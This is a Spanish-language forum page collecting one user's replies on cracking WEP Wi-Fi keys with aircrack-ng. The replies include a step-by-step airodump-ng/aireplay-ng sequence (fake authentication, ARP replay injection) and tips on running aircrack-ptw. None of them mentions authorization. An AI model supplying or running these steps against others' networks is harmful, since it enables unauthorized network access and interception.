Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - osiosiosi

#1
Como regla general suele ser mas lento, aunque yo me he encontrado de todo. Desde estar una hora con "asociacion falsa + ataque 3" y no conseguir un puñetero data, hasta esperar un minuto haciendo lo mismo y empezar a subir los data a toda caña...
Ya ves k depende. Pero por regla general subiran antes con un cliente ya asociado.

Salu2
#2
Resumiendo:

1. airodump-ng -c canal_del_ap --bssid nombre_del_ap -w fichero_de_captura nombre_de tu_interfaz_wifi

2. aireplay-ng -1 10 -e nombre_del_ap -a mac_del_ap -h tu_mac

3. aireplay-ng -3 -b mac_del_ap -h tu_mac nombre_de tu_interfaz_wifi *

* el paso 2 no seria necesario en caso de que hubiera cliente(s) ya asociados al ap o punto de acceso en cuestion. En ese caso el punto 3 seria:

aireplay-ng -3 -b mac_del_ap -h mac_cliente_ya asociado nombre_de tu_interfaz_wifi *

aunque no pasa nada si ejecutas el paso 2 en esta situacion..

Bueno, espero que solvente tus dudas. De todas formas mirate los tutoriales que rulan por el foro que te lo explican todo mas extenso.

Venga un saludo
#3
Hola dj_king,

El nombre de lfichero se lo has especificado anteriormente al airodump asi:

airodump-ng -w nombre_de_fichero nomre_de_tu_interfaz_wifi

El fichero sera en este caso: nombre_de_fichero.cap y estara ubicado en el direcorio desde el que hayas ejecutado el comando airodump-ng.

Y ya te digo, mejor no pararlo y ejecutar aircrack ruta_de_nombre_de_fichero.cap asi el solo ira cogiendo los IVs a medida que el airodump los vaya generando en el fichero. Si, claro que puedes parar el airodump, ningun problema, solo que como ya dije, si los IVs "cazados" no son suficientes el aircrack no va a sacar la WEP y vas a tenet que empezar de 0. Ya, ya,....., igual para algunos volver a cazar 60000 de nuevo es cosa de 2 minutos, pero para otros no. Sin mas.

venga, un saludo
#4
Solo un apunte:Cuando dices "º descifrando
Cuando ya tenemos de 60.000 paquetes para arriba, paramos el airodump, hacemos dir y vemos como se llama el fichero .cap"

Mejor no pararlo ya que si lo haces y con 60.000 paquetes el aircrack no puede sacar la clave tendras que repetir el proceso desde 0. Dejarlo corriendo y el propio aircrack ira probando con los consiguientes paquetes segun se vayan pillando. Resumiendo, cuando llegue a esa cifra (a veces con 20000 es suficiente para el aircrack-ptw), correr el aircrack-ptw de la siguiente manera:  aircrack-ptw ficherocap.cap .

Pues eso, un pequeño apunte.
Suerte